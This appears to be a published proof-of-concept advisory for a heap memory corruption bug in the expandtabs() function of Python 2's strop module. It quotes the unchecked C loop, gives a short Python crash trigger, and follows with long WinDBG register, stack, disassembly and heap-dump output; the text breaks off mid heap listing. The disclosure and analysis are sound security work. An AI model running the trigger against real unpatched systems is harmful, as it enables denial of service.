Python – Interpreter Heap Memory Corruption (PoC)

# Title: Python Interpreter Heap Memory Corruption
# Date: Sun, 30 Mar 2014 20:09:44 -0400
# Vulnerability Discovered By : Unknown
# Proof of Concept : Debasish Mandal (https://twitter.com/debasishm89)
# Software Link: https://www.python.org/
# Version: All , Fix released (http://hg.python.org/cpython/rev/5dabc2d2f776)
# Tested on: Microsoft Windows XP Professional SP2 EN (32bit)

Recentl a new fix has been pushed to official python source code repository which fixes (http://hg.python.org/cpython/rev/5dabc2d2f776
) a memory corruption vulnerability in python interpreter’s strop module. The vulnerability lies in expandtabs() functions.
This is due to a missing check in line 626,627 of /Modules/stropmodule.c.

Vulnerable Code:

https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627

————————————————————————————————————
for (p = string; p < e; p++) { if (*p == '\t') { j += tabsize - (j%tabsize); if (old_j > j) {
PyErr_SetString(PyExc_OverflowError,
“new string is too long”);
return NULL;
}
old_j = j;
} else {
j++;
if (*p == ‘\n’) {
// Missing check
i += j;
j = 0;
}
}
}
————————————————————————————————————

Patch Diff:
http://hg.python.org/cpython/diff/5dabc2d2f776/Modules/stropmodule.c

=================
Proof of Concept:
=================

Running below code will crash the vulnerable python.exe process.

import strop
raw_input(‘Press Enter to BOOM!’)
a = ‘\t\n’ * 65536
strop.expandtabs(a, 65536)

============================
Crash Analysis using WinDBG:
============================

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*E:\symbol*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 1d000000 1d00a000 C:\Python27\python.exe
ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 1e000000 1e227000 C:\WINDOWS\system32\python27.dll
ModLoad: 77d40000 77dd0000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f56000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f01000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 7c9c0000 7d1d4000 C:\WINDOWS\system32\SHELL32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\MSVCR90.dll
ModLoad: 773d0000 774d2000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
ModLoad: 5d090000 5d127000 C:\WINDOWS\system32\comctl32.dll
(f0.320): Break instruction exception – code 80000003 (first chance)
eax=7ffd6000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
eip=7c901230 esp=023dffcc ebp=023dfff4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
ntdll!DbgBreakPoint:
7c901230 cc int 3
0:001> g
(f0.1f4): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20202020 ebx=0263bffe ecx=00003fff edx=00000001 esi=00010000 edi=025cf000
eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
MSVCR90!memset+0x5f:
7855b37f f3ab rep stos dword ptr es:[edi]

We can see we have a write access violation at MSVCR90!memset+0x5f:

Crash stack trace:

0:000> kb
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\python27.dll –
ChildEBP RetAddr Args to Child
0021fce4 1e0483e2 025ceffd 00000020 00010000 MSVCR90!memset+0x5f
WARNING: Stack unwind information not available. Following frames may be wrong.
0021fd1c 1e08883b 00000000 022e7cd8 022eb5a8 python27!PyOS_AfterFork+0xc9f
0021fd38 1e0bf781 022eb5a8 022e7cd8 00000000 python27!PyCFunction_Call+0x138
0021fd60 1e0bcb94 1e0bd826 0021fdc4 01e280f8 python27!PyEval_GetFuncDesc+0x341
0021fd64 1e0bd826 0021fdc4 01e280f8 02663ff0 python27!PyEval_EvalFrameEx+0x18e4
0021fdd8 1e0be200 0021fe20 1e0be82e 02663eb8 python27!PyEval_EvalFrameEx+0x2576
0021fde0 1e0be82e 02663eb8 00000000 0261e2c0 python27!PyEval_EvalCodeEx+0x50
0021fe20 1e0bb295 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCodeEx+0x67e
0021fe54 1e0e0d68 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCode+0x25
0021fe70 1e0e0d36 0261e2c0 01de2ff3 01e1e6f0 python27!PyRun_FileExFlags+0x97
0021fe9c 1e0e0329 785b7408 01de2ff3 00000101 python27!PyRun_FileExFlags+0x65
0021fed8 1e0dff3e 785b7408 01de2ff3 00000001 python27!PyRun_SimpleFileExFlags+0x133
0021fef8 1e02f5df 785b7408 01de2ff3 00000001 python27!PyRun_AnyFileExFlags+0x4c
*** ERROR: Module load completed but symbols could not be loaded for C:\Python27\python.exe
0021ff7c 1d001160 00000002 01de2fd0 01d9ef80 python27!Py_Main+0x805
0021ffc0 7c816d4f 00090000 01fa0cda 7ffd6000 python+0x1160
0021fff0 00000000 1d0012a8 00000000 78746341 kernel32!BaseProcessStart+0x23

We crashed inside MSVCR90!memset

After that we restart the app and set a break point at memset.

0:001> bp MSVCR90!memset
0:001> g
Breakpoint 0 hit
eax=00aada58 ebx=00000014 ecx=00000014 edx=00000a98 esi=1e1e0658 edi=00aada58
eip=7855b320 esp=0021fbe8 ebp=0021fc30 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
MSVCR90!memset:
7855b320 8b54240c mov edx,dword ptr [esp+0Ch] ss:0023:0021fbf4=00000014

Partial Dis assembly of memset caller:

.text:1E0483D0 sub esi, edx
.text:1E0483D2 add [ebp+var_4], esi
.text:1E0483D5 test esi, esi
.text:1E0483D7 jle short loc_1E0483F8
.text:1E0483D9 push esi ; Size
.text:1E0483DA push 20h ; Val
.text:1E0483DC push edi ; Dst
.text:1E0483DD call memset
.text:1E0483E2 add esp, 0Ch
.text:1E0483E5 add edi, esi
.text:1E0483E7 jmp short loc_1E0483F8
.tex

edi=00aada58 is pointing to destination where final string is getting copied.

0:000> dd esp
0021fbe8 1e0978ad 00aada58 00000000 00000014
0021fbf8 00a81310 1e0977a2 1e1e0658 1e075222
0021fc08 1e1e0658 00000000 1e0977a2 1e0977dc
0021fc18 1e1e0658 00a81310 00000000 1e1e0658
0021fc28 1e0977a2 00aa8e40 0021fc9c 1e0650fe
0021fc38 1e1e0658 00a81310 00000000 009aabf0
0021fc48 00a81310 1e06518c 1e1e0658 00a81310
0021fc58 00000000 009aabf0 00000000 1e0651d9

0:000> !address 00aada58
00a80000 : 00a80000 – 0004b000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 00970000

It’s confirmed that the memset() is actually trying write to heap. After few calls to memset the python.exe process will crash.

0:000> g
(7d8.44c): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20202020 ebx=00adbf66 ecx=000037e1 edx=00000001 esi=00010000 edi=00b0e000
eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
MSVCR90!memset+0x5f:
7855b37f f3ab rep stos dword ptr es:[edi]

=========================================
Verify memory corruption using bang heap:
=========================================

0:000> !heap -s
Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast
(k) (k) (k) (k) length blocks cont. heap
—————————————————————————–
00240000 00000002 1024 32 32 8 1 1 0 0 L
00340000 00001002 64 24 24 13 1 1 0 0 L
00350000 00008000 64 12 12 10 1 1 0 0
00930000 00001002 64 16 16 2 1 1 0 0 L
00950000 00001002 64 16 16 2 2 1 0 0 L
00970000 00001002 3136 1644 1656 33 3 2 0 0 L
—————————————————————————–

0x00240000 is Default Process Heap. From the size of commited bytes we can say 0x00970000 handling a large number of data.

0:000> !heap -a 00970000
Index Address Name Debugging options enabled
6: 00970000
Segment at 00970000 to 00980000 (00010000 bytes committed)
Segment at 00980000 to 00a80000 (00100000 bytes committed)
Segment at 00a80000 to 00c80000 (0008b000 bytes committed)
Flags: 00001002
ForceFlags: 00000000
Granularity: 8 bytes
Segment Reserve: 00400000
Segment Commit: 00002000
DeCommit Block Thres: 00000200
DeCommit Total Thres: 00002000
Total Free Size: 000010df
Max. Allocation Size: 7ffdefff
Lock Variable at: 00970608
Next TagIndex: 0000
Maximum TagIndex: 0000
Tag Entries: 00000000
PsuedoTag Entries: 00000000
Virtual Alloc List: 00970050
UCR FreeList: 00970598
FreeList Usage: 84091158 00001001 00000000 80000000
FreeList[ 00 ] at 00970178: 00ac5eb8 . 00a6f8d8
00a6f8d0: 01008 . 00ad8 [00] – free
00b0bf88: 10100 . 10100 [20] – free
Unable to read nt!_HEAP_FREE_ENTRY structure at 20202018
FreeList[ 03 ] at 00970190: 00a38ff0 . 00a57fe0
00a57fd8: 00048 . 00018 [00] – free
00a38fe8: 00048 . 00018 [00] – free
FreeList[ 04 ] at 00970198: 009c1fe8 . 009c1fe8
009c1fe0: 00188 . 00020 [00] – free
FreeList[ 06 ] at 009701a8: 00acf128 . 00acf128
00acf120: 00130 . 00030 [00] – free
FreeList[ 08 ] at 009701b8: 00a58fb8 . 00a58fb8
00a58fb0: 00010 . 00040 [00] – free
FreeList[ 0c ] at 009701d8: 009cb980 . 009cb980
009cb978: 00010 . 00060 [00] – free
FreeList[ 10 ] at 009701f8: 009c7588 . 009c7588
009c7580: 00178 . 00080 [00] – free
FreeList[ 13 ] at 00970210: 00a2af50 . 00a2af50
00a2af48: 000c8 . 00098 [00] – free
FreeList[ 1a ] at 00970248: 00ac5a68 . 00ac5a68
00ac5a60: 00170 . 000d0 [00] – free
FreeList[ 1f ] at 00970270: 00a71990 . 00a71990
00a71988: 00188 . 000f8 [00] – free
FreeList[ 20 ] at 00970278: 00a78c78 . 00a78c78
00a78c70: 00188 . 00100 [00] – free
FreeList[ 2c ] at 009702d8: 009d8788 . 009d8788
009d8780: 001d0 . 00160 [00] – free
FreeList[ 7f ] at 00970570: 00a7a3c0 . 00a7a3c0
00a7a3b8: 00220 . 003f8 [00] – free
Segment00 at 00970640:
Flags: 00000000
Base: 00970000
First Entry: 00970680
Last Entry: 00980000
Total Pages: 00000010
Total UnCommit: 00000000
Largest UnCommit:00000000
UnCommitted Ranges: (0)

Heap entries for Segment00 in Heap 00970000
00970000: 00000 . 00640 [01] – busy (640)
00970640: 00640 . 00040 [01] – busy (40)
00970680: 00040 . 01808 [01] – busy (1800)
00971e88: 01808 . 00220 [01] – busy (214)
009720a8: 00220 . 00808 [01] – busy (800)
009728b0: 00808 . 001c8 [01] – busy (1c0)
00972a78: 001c8 . 00188 [01] – busy (180)
00972c00: 00188 . 00010 [01] – busy (4)
00972c10: 00010 . 00010 [01] – busy (4)
00972c20: 00010 . 00010 [01] – busy (4)
00972c30: 00010 . 00018 [01] – busy (10)
00972c48: 00018 . 00020 [01] – busy (18)
00972c68: 00020 . 00018 [01] – busy (10)
00972c80: 00018 . 00018 [01] – busy (10)
00972c98: 00018 . 00028 [01] – busy (20)
00972cc0: 00028 . 00018 [01] – busy (c)
00972cd8: 00018 . 00010 [01] – busy (8)
00972ce8: 00010 . 00228 [01] – busy (220)
00972f10: 00228 . 00088 [01] – busy (7c)
00972f98: 00088 . 00040 [01] – busy (34)
00972fd8: 00040 . 00050 [01] – busy (43)
00973028: 00050 . 00020 [01] – busy (13)
00973048: 00020 . 00040 [01] – busy (31)
00973088: 00040 . 00028 [01] – busy (1d)
009730b0: 00028 . 00030 [01] – busy (24)
009730e0: 00030 . 00020 [01] – busy (14)
00973100: 00020 . 00020 [01] – busy (12)
00973120: 00020 . 00018 [01] – busy (d)
00973138: 00018 . 00040 [01] – busy (31)
00973178: 00040 . 00028 [01] – busy (1e)
009731a0: 00028 . 00020 [01] – busy (17)
009731c0: 00020 . 00018 [01] – busy (e)
009731d8: 00018 . 00098 [01] – busy (8a)
00973270: 00098 . 00048 [01] – busy (39)
009732b8: 00048 . 00028 [01] – busy (1b)
009732e0: 00028 . 00050 [01] – busy (45)
00973330: 00050 . 00020 [01] – busy (12)
00973350: 00020 . 00020 [01] – busy (18)
00973370: 00020 . 00028 [01] – busy (1e)
00973398: 00028 . 00020 [01] – busy (13)
009733b8: 00020 . 00020 [01] – busy (14)
009733d8: 00020 . 00018 [01] – busy (f)
009733f0: 00018 . 00020 [01] – busy (16)
00973410: 00020 . 00030 [01] – busy (28)
00973440: 00030 . 00030 [01] – busy (27)
00973470: 00030 . 00028 [01] – busy (1b)
00973498: 00028 . 00028 [01] – busy (19)
009734c0: 00028 . 00040 [01] – busy (36)
00973500: 00040 . 00020 [01] – busy (12)
00973520: 00020 . 00808 [01] – busy (800)
00973d28: 00808 . 00088 [01] – busy (80)
00973db0: 00088 . 00088 [01] – busy (80)
00973e38: 00088 . 00038 [01] – busy (30)
00973e70: 00038 . 00030 [01] – busy (24)
00973ea0: 00030 . 00018 [01] – busy (c)
00973eb8: 00018 . 00060 [01] – busy (54)
00973f18: 00060 . 00188 [01] – busy (180)
009740a0: 00188 . 00608 [01] – busy (600)
009746a8: 00608 . 00608 [01] – busy (600)
00974cb0: 00608 . 00608 [01] – busy (600)
009752b8: 00608 . 00208 [01] – busy (1fd)
009754c0: 00208 . 00188 [01] – busy (180)
00975648: 00188 . 00608 [01] – busy (600)
00975c50: 00608 . 00608 [01] – busy (600)
00976258: 00608 . 00228 [01] – busy (219)
00976480: 00228 . 00608 [01] – busy (600)
00976a88: 00608 . 00048 [01] – busy (3c)
00976ad0: 00048 . 00150 [01] – busy (145)
00976c20: 00150 . 00188 [01] – busy (180)
00976da8: 00188 . 00110 [01] – busy (107)
00976eb8: 00110 . 00188 [01] – busy (180)
00977040: 00188 . 00608 [01] – busy (600)
00977648: 00608 . 00190 [01] – busy (187)
009777d8: 00190 . 00608 [01] – busy (600)
00977de0: 00608 . 00608 [01] – busy (600)
009783e8: 00608 . 00110 [01] – busy (103)
009784f8: 00110 . 00220 [01] – busy (216)
00978718: 00220 . 00188 [01] – busy (180)
009788a0: 00188 . 00070 [01] – busy (64)
00978910: 00070 . 00188 [01] – busy (180)
00978a98: 00188 . 00608 [01] – busy (600)
009790a0: 00608 . 00608 [01] – busy (600)
009796a8: 00608 . 00148 [01] – busy (13b)
009797f0: 00148 . 00188 [01] – busy (180)
00979978: 00188 . 00608 [01] – busy (600)
00979f80: 00608 . 00170 [01] – busy (162)
0097a0f0: 00170 . 00608 [01] – busy (600)
0097a6f8: 00608 . 00188 [01] – busy (180)
0097a880: 00188 . 00608 [01] – busy (600)
0097ae88: 00608 . 00608 [01] – busy (600)
0097b490: 00608 . 001a8 [01] – busy (19c)
0097b638: 001a8 . 00098 [01] – busy (8c)
0097b6d0: 00098 . 00188 [01] – busy (180)
0097b858: 00188 . 00608 [01] – busy (600)
0097be60: 00608 . 00188 [01] – busy (180)
0097bfe8: 00188 . 00188 [01] – busy (180)
0097c170: 00188 . 00188 [01] – busy (180)
0097c2f8: 00188 . 00608 [01] – busy (600)
0097c900: 00608 . 00188 [01] – busy (180)
0097ca88: 00188 . 00608 [01] – busy (600)
0097d090: 00608 . 00188 [01] – busy (180)
0097d218: 00188 . 000c0 [01] – busy (b8)
0097d2d8: 000c0 . 00188 [01] – busy (180)
0097d460: 00188 . 00188 [01] – busy (180)
0097d5e8: 00188 . 00608 [01] – busy (600)
0097dbf0: 00608 . 00188 [01] – busy (180)
0097dd78: 00188 . 00608 [01] – busy (600)
0097e380: 00608 . 003d8 [01] – busy (3ce)
0097e758: 003d8 . 003e8 [01] – busy (3dc)
0097eb40: 003e8 . 003e8 [01] – busy (3dc)
0097ef28: 003e8 . 003e8 [01] – busy (3dc)
0097f310: 003e8 . 003e8 [01] – busy (3dc)
0097f6f8: 003e8 . 00608 [01] – busy (600)
0097fd00: 00608 . 000f8 [01] – busy (f0)
0097fdf8: 000f8 . 00150 [01] – busy (148)
0097ff48: 00150 . 00038 [01] – busy (30)
0097ff80: 00038 . 00080 [11] – busy (78)
Segment01 at 00980000:
Flags: 00000000
Base: 00980000
First Entry: 00980040
Last Entry: 00a80000
Total Pages: 00000100
Total UnCommit: 00000000
Largest UnCommit:00000000
UnCommitted Ranges: (0)

Heap entries for Segment01 in Heap 00970000
00980000: 00000 . 00040 [01] – busy (40)
00980040: 00040 . 40008 [01] – busy (40000)
009c0048: 40008 . 00608 [01] – busy (600)
009c0650: 00608 . 01808 [01] – busy (1800)
009c1e58: 01808 . 00188 [01] – busy (180)
009c1fe0: 00188 . 00020 [00]
009c2000: 00020 . 00608 [01] – busy (600)
009c2608: 00608 . 00608 [01] – busy (600)
009c2c10: 00608 . 00608 [01] – busy (600)
009c3218: 00608 . 01808 [01] – busy (1800)
009c4a20: 01808 . 00160 [01] – busy (158)
009c4b80: 00160 . 00188 [01] – busy (180)
009c4d08: 00188 . 00160 [01] – busy (158)
009c4e68: 00160 . 00188 [01] – busy (180)
009c4ff0: 00188 . 00608 [01] – busy (600)
009c55f8: 00608 . 01808 [01] – busy (1800)
009c6e00: 01808 . 00608 [01] – busy (600)
009c7408: 00608 . 00178 [01] – busy (16c)
009c7580: 00178 . 00080 [00]
009c7600: 00080 . 002e8 [01] – busy (2df)
009c78e8: 002e8 . 00198 [01] – busy (18a)
009c7a80: 00198 . 00220 [01] – busy (214)
009c7ca0: 00220 . 00200 [01] – busy (1f8)
009c7ea0: 00200 . 001d0 [01] – busy (1c1)
009c8070: 001d0 . 00260 [01] – busy (257)
009c82d0: 00260 . 001d8 [01] – busy (1cb)
009c84a8: 001d8 . 00168 [01] – busy (160)
009c8610: 00168 . 00188 [01] – busy (180)
009c8798: 00188 . 001b0 [01] – busy (1a8)
009c8948: 001b0 . 001a8 [01] – busy (19d)
009c8af0: 001a8 . 000c8 [01] – busy (c0)
009c8bb8: 000c8 . 00050 [01] – busy (48)
009c8c08: 00050 . 00010 [01] – busy (4)
009c8c18: 00010 . 00f88 [01] – busy (f7f)
009c9ba0: 00f88 . 00090 [01] – busy (82)
009c9c30: 00090 . 003f0 [01] – busy (3e8)
009ca020: 003f0 . 00128 [01] – busy (120)
009ca148: 00128 . 00120 [01] – busy (114)
009ca268: 00120 . 00608 [01] – busy (600)
009ca870: 00608 . 00148 [01] – busy (140)
009ca9b8: 00148 . 00608 [01] – busy (600)
009cafc0: 00608 . 000d0 [01] – busy (c8)
009cb090: 000d0 . 00608 [01] – busy (600)
009cb698: 00608 . 00250 [01] – busy (247)
009cb8e8: 00250 . 00018 [01] – busy (10)
009cb900: 00018 . 00018 [01] – busy (10)
009cb918: 00018 . 00020 [01] – busy (18)
009cb938: 00020 . 00018 [01] – busy (10)
009cb950: 00018 . 00018 [01] – busy (10)
009cb968: 00018 . 00010 [01] – busy (2)
009cb978: 00010 . 00060 [00]
009cb9d8: 00060 . 00608 [01] – busy (600)
009cbfe0: 00608 . 00048 [01] – busy (3c)
009cc028: 00048 . 00020 [01] – busy (18)
009cc048: 00020 . 00018 [01] – busy (10)
009cc060: 00018 . 00018 [01] – busy (10)
009cc078: 00018 . 00188 [01] – busy (180)
009cc200: 00188 . 00030 [01] – busy (24)
009cc230: 00030 . 00018 [01] – busy (10)
009cc248: 00018 . 00188 [01] – busy (180)
009cc3d0: 00188 . 00030 [01] – busy (22)
009cc400: 00030 . 00018 [01] – busy (10)
009cc418: 00018 . 00028 [01] – busy (20)
009cc440: 00028 . 00018 [01] – busy (10)
009cc458: 00018 . 00188 [01] – busy (180)
009cc5e0: 00188 . 00018 [01] – busy (10)
009cc5f8: 00018 . 00018 [01] – busy (10)
009cc610: 00018 . 00048 [01] – busy (40)
009cc658: 00048 . 00018 [01] – busy (10)
009cc670: 00018 . 00188 [01] – busy (180)
009cc7f8: 00188 . 00018 [01] – busy (10)
009cc810: 00018 . 00188 [01] – busy (180)
009cc998: 00188 . 00018 [01] – busy (10)
009cc9b0: 00018 . 00188 [01] – busy (180)
009ccb38: 00188 . 00018 [01] – busy (c)
009ccb50: 00018 . 00018 [01] – busy (10)
009ccb68: 00018 . 00048 [01] – busy (40)
009ccbb0: 00048 . 00130 [01] – busy (127)
009ccce0: 00130 . 00188 [01] – busy (180)
009cce68: 00188 . 00018 [01] – busy (10)
009cce80: 00018 . 00188 [01] – busy (180)
009cd008: 00188 . 00608 [01] – busy (600)
009cd610: 00608 . 00608 [01] – busy (600)
009cdc18: 00608 . 01808 [01] – busy (1800)
009cf420: 01808 . 001f8 [01] – busy (1ef)
009cf618: 001f8 . 00270 [01] – busy (264)
009cf888: 00270 . 001e0 [01] – busy (1d8)
009cfa68: 001e0 . 00188 [01] – busy (180)
009cfbf0: 00188 . 000c8 [01] – busy (c0)
009cfcb8: 000c8 . 00188 [01] – busy (180)
009cfe40: 00188 . 005d8 [01] – busy (5ca)
009d0418: 005d8 . 00080 [01] – busy (78)
009d0498: 00080 . 00308 [01] – busy (300)
009d07a0: 00308 . 00188 [01] – busy (180)
009d0928: 00188 . 00018 [01] – busy (10)
009d0940: 00018 . 00188 [01] – busy (180)
009d0ac8: 00188 . 00020 [01] – busy (18)
009d0ae8: 00020 . 00c10 [01] – busy (c00)
009d16f8: 00c10 . 003e8 [01] – busy (3dc)
009d1ae0: 003e8 . 00010 [01] – busy (4)
009d1af0: 00010 . 00260 [01] – busy (255)
009d1d50: 00260 . 000f0 [01] – busy (e8)
009d1e40: 000f0 . 00158 [01] – busy (14f)
009d1f98: 00158 . 00a60 [01] – busy (a51)
009d29f8: 00a60 . 00168 [01] – busy (160)
009d2b60: 00168 . 00178 [01] – busy (16f)
009d2cd8: 00178 . 00258 [01] – busy (24d)
009d2f30: 00258 . 00138 [01] – busy (12b)
009d3068: 00138 . 00158 [01] – busy (150)
009d31c0: 00158 . 00158 [01] – busy (14a)
009d3318: 00158 . 00180 [01] – busy (178)
009d3498: 00180 . 00138 [01] – busy (12b)
009d35d0: 00138 . 00158 [01] – busy (14f)
009d3728: 00158 . 00178 [01] – busy (16c)
009d38a0: 00178 . 00180 [01] – busy (178)
009d3a20: 00180 . 001f0 [01] – busy (1e4)
009d3c10: 001f0 . 002c0 [01] – busy (2b4)
009d3ed0: 002c0 . 00200 [01] – busy (1f8)
009d40d0: 00200 . 001f8 [01] – busy (1f0)
009d42c8: 001f8 . 01808 [01] – busy (1800)
009d5ad0: 01808 . 00608 [01] – busy (600)
009d60d8: 00608 . 00608 [01] – busy (600)
009d66e0: 00608 . 000e8 [01] – busy (dc)
009d67c8: 000e8 . 00018 [01] – busy (c)
009d67e0: 00018 . 00030 [01] – busy (28)
009d6810: 00030 . 00198 [01] – busy (18e)
009d69a8: 00198 . 00970 [01] – busy (963)
009d7318: 00970 . 000c0 [01] – busy (b8)
009d73d8: 000c0 . 001d8 [01] – busy (1cf)
009d75b0: 001d8 . 00128 [01] – busy (11d)
009d76d8: 00128 . 00110 [01] – busy (104)
009d77e8: 00110 . 00168 [01] – busy (15a)
009d7950: 00168 . 00150 [01] – busy (141)
009d7aa0: 00150 . 001b0 [01] – busy (1a4)
009d7c50: 001b0 . 00198 [01] – busy (18d)
009d7de8: 00198 . 00148 [01] – busy (140)
009d7f30: 00148 . 003b0 [01] – busy (3a4)
009d82e0: 003b0 . 00110 [01] – busy (105)

009d83f0: 00110 . 001c0 [01] – busy (1b1)
009d85b0: 001c0 . 001d0 [01] – busy (1c7)
009d8780: 001d0 . 00160 [00]
009d88e0: 00160 . 00018 [01] – busy (c)
009d88f8: 00018 . 00188 [01] – busy (180)
009d8a80: 00188 . 00020 [01] – busy (18)
009d8aa0: 00020 . 01808 [01] – busy (1800)
009da2a8: 01808 . 00608 [01] – busy (600)
009da8b0: 00608 . 001a8 [01] – busy (19a)
009daa58: 001a8 . 00608 [01] – busy (600)
009db060: 00608 . 00140 [01] – busy (133)
009db1a0: 00140 . 00c08 [01] – busy (c00)
009dbda8: 00c08 . 00158 [01] – busy (14d)
009dbf00: 00158 . 00160 [01] – busy (155)
009dc060: 00160 . 00368 [01] – busy (35e)
009dc3c8: 00368 . 00140 [01] – busy (132)
009dc508: 00140 . 01808 [01] – busy (1800)
009ddd10: 01808 . 00170 [01] – busy (168)
009dde80: 00170 . 00130 [01] – busy (124)
009ddfb0: 00130 . 00018 [01] – busy (10)
009ddfc8: 00018 . 00018 [01] – busy (4)
009ddfe0: 00018 . 00188 [01] – busy (180)
009de168: 00188 . 00188 [01] – busy (180)
009de2f0: 00188 . 00188 [01] – busy (180)
009de478: 00188 . 00608 [01] – busy (600)
009dea80: 00608 . 00158 [01] – busy (150)
009debd8: 00158 . 00020 [01] – busy (18)
009debf8: 00020 . 00020 [01] – busy (14)
009dec18: 00020 . 00018 [01] – busy (10)
009dec30: 00018 . 00020 [01] – busy (18)
009dec50: 00020 . 00018 [01] – busy (10)
009dec68: 00018 . 00018 [01] – busy (10)
009dec80: 00018 . 00018 [01] – busy (10)
009dec98: 00018 . 00010 [01] – busy (4)
009deca8: 00010 . 00070 [01] – busy (64)
009ded18: 00070 . 00198 [01] – busy (18c)
009deeb0: 00198 . 00020 [01] – busy (18)
009deed0: 00020 . 000f0 [01] – busy (e8)
009defc0: 000f0 . 00210 [01] – busy (202)
009df1d0: 00210 . 00218 [01] – busy (20e)
009df3e8: 00218 . 00238 [01] – busy (229)
009df620: 00238 . 000d0 [01] – busy (c0)
009df6f0: 000d0 . 004a0 [01] – busy (498)
009dfb90: 004a0 . 00098 [01] – busy (90)
009dfc28: 00098 . 00120 [01] – busy (117)
009dfd48: 00120 . 001d0 [01] – busy (1c1)
009dff18: 001d0 . 40008 [01] – busy (40000)
00a1ff20: 40008 . 00330 [01] – busy (324)
00a20250: 00330 . 00188 [01] – busy (180)
00a203d8: 00188 . 00150 [01] – busy (145)
00a20528: 00150 . 00190 [01] – busy (188)
00a206b8: 00190 . 00188 [01] – busy (180)
00a20840: 00188 . 00218 [01] – busy (210)
00a20a58: 00218 . 00188 [01] – busy (180)
00a20be0: 00188 . 00188 [01] – busy (180)
00a20d68: 00188 . 00040 [01] – busy (38)
00a20da8: 00040 . 00120 [01] – busy (117)
00a20ec8: 00120 . 00020 [01] – busy (18)
00a20ee8: 00020 . 000e8 [01] – busy (dc)
00a20fd0: 000e8 . 00608 [01] – busy (600)
00a215d8: 00608 . 00178 [01] – busy (170)
00a21750: 00178 . 00270 [01] – busy (268)
00a219c0: 00270 . 00078 [01] – busy (64)
00a21a38: 00078 . 00190 [01] – busy (184)
00a21bc8: 00190 . 00608 [01] – busy (600)
00a221d0: 00608 . 00188 [01] – busy (180)
00a22358: 00188 . 00188 [01] – busy (180)
00a224e0: 00188 . 001e0 [01] – busy (1d8)
00a226c0: 001e0 . 00188 [01] – busy (180)
00a22848: 00188 . 00120 [01] – busy (117)
00a22968: 00120 . 00028 [01] – busy (20)
00a22990: 00028 . 00018 [01] – busy (c)
00a229a8: 00018 . 00188 [01] – busy (180)
00a22b30: 00188 . 00018 [01] – busy (10)
00a22b48: 00018 . 00020 [01] – busy (14)
00a22b68: 00020 . 00020 [01] – busy (14)
00a22b88: 00020 . 00048 [01] – busy (40)
00a22bd0: 00048 . 00288 [01] – busy (27b)
00a22e58: 00288 . 00250 [01] – busy (244)
00a230a8: 00250 . 00148 [01] – busy (140)
00a231f0: 00148 . 001e0 [01] – busy (1d8)
00a233d0: 001e0 . 00608 [01] – busy (600)
00a239d8: 00608 . 00170 [01] – busy (164)
00a23b48: 00170 . 001e0 [01] – busy (1d8)
00a23d28: 001e0 . 00070 [01] – busy (62)
00a23d98: 00070 . 00148 [01] – busy (13a)
00a23ee0: 00148 . 000f0 [01] – busy (e8)
00a23fd0: 000f0 . 001b0 [01] – busy (1a4)
00a24180: 001b0 . 003a0 [01] – busy (397)
00a24520: 003a0 . 001e0 [01] – busy (1d4)
00a24700: 001e0 . 00200 [01] – busy (1f8)
00a24900: 00200 . 00150 [01] – busy (146)
00a24a50: 00150 . 00258 [01] – busy (250)
00a24ca8: 00258 . 001e8 [01] – busy (1d9)
00a24e90: 001e8 . 00258 [01] – busy (250)
00a250e8: 00258 . 00158 [01] – busy (150)
00a25240: 00158 . 001e0 [01] – busy (1d8)
00a25420: 001e0 . 001e0 [01] – busy (1d8)
00a25600: 001e0 . 00080 [01] – busy (78)
00a25680: 00080 . 00070 [01] – busy (60)
00a256f0: 00070 . 001e0 [01] – busy (1d8)
00a258d0: 001e0 . 00608 [01] – busy (600)
00a25ed8: 00608 . 00338 [01] – busy (330)
00a26210: 00338 . 00188 [01] – busy (180)
00a26398: 00188 . 00278 [01] – busy (26a)
00a26610: 00278 . 001e0 [01] – busy (1d8)
00a267f0: 001e0 . 00188 [01] – busy (180)
00a26978: 00188 . 00178 [01] – busy (16c)
00a26af0: 00178 . 002b8 [01] – busy (2ae)
00a26da8: 002b8 . 00188 [01] – busy (180)
00a26f30: 00188 . 001e0 [01] – busy (1d8)
00a27110: 001e0 . 00188 [01] – busy (180)
00a27298: 00188 . 00180 [01] – busy (174)
00a27418: 00180 . 00178 [01] – busy (16c)
